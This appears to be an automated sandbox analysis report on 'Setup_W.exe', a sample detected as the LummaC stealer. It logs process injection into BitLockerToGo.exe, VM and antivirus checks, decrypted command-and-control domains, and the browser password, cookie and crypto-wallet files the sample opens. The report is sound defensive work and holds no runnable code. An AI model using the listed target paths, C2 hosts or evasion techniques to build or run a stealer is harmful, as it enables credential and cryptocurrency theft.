Source: C:\Users\user\Desktop\Setup_W.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Setup_W.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Setup_W.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Setup_W.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\Setup_W.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\glfw.4281411633.dll

Jump to dropped file

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 7728	Thread sleep time: -150000s >= -30000s			Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 7752	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: BitLockerToGo.exe, BitLockerToGo.exe, 00000004.00000003.2145451743.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063212917.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2169738032.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2293630756.000000000324C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292404891.000000000324C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2293687502.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292724484.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292404891.0000000003286000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Setup_W.exe, 00000000.00000002.2013046042.000000000115E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Setup_W.exe

0_2_64608848

Source: C:\Users\user\Desktop\Setup_W.exe	Code function: 0_2_646105EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,		0_2_646105EC
Source: C:\Users\user\Desktop\Setup_W.exe	Code function: 0_2_646105F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,		0_2_646105F0

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\Setup_W.exe

Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Setup_W.exe

Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: Setup_W.exe, 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: rapeflowwj.lat
Source: Setup_W.exe, 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: crosshuaht.lat
Source: Setup_W.exe, 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: sustainskelet.lat
Source: Setup_W.exe, 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: aspecteirs.lat
Source: Setup_W.exe, 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: energyaffai.lat
Source: Setup_W.exe, 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: necklacebudi.lat
Source: Setup_W.exe, 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: discokeyus.lat
Source: Setup_W.exe, 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: grannyejh.lat
Source: Setup_W.exe, 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: mooncobudy.click

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Setup_W.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2F62008	Jump to behavior
Source: C:\Users\user\Desktop\Setup_W.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\Setup_W.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\Setup_W.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 440000	Jump to behavior
Source: C:\Users\user\Desktop\Setup_W.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 443000	Jump to behavior
Source: C:\Users\user\Desktop\Setup_W.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 452000	Jump to behavior

Source: C:\Users\user\Desktop\Setup_W.exe

Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Setup_W.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Setup_W.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Setup_W.exe

Code function: 0_2_64610530 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_64610530

Source: C:\Users\user\Desktop\Setup_W.exe

Code function: 0_2_646031E0 glfwGetVersion,

0_2_646031E0

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: BitLockerToGo.exe, 00000004.00000003.2169738032.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2293855753.00000000032E3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292404891.00000000032E3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2169550431.0000000005551000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2169597412.00000000032E1000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2182980470.00000000032E3000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BitLockerToGo.exe PID: 7680, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: BitLockerToGo.exe	String found in binary or memory: s/Electrum-LTC
Source: BitLockerToGo.exe	String found in binary or memory: /Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Walletsf`Cc!
Source: BitLockerToGo.exe	String found in binary or memory: window-state.json
Source: BitLockerToGo.exe	String found in binary or memory: Wallets/JAXX New Version
Source: BitLockerToGo.exe	String found in binary or memory: Wallets/Exodus
Source: BitLockerToGo.exe	String found in binary or memory: %appdata%\Ethereum
Source: BitLockerToGo.exe, 00000004.00000003.2145537455.0000000003258000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: BitLockerToGo.exe	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
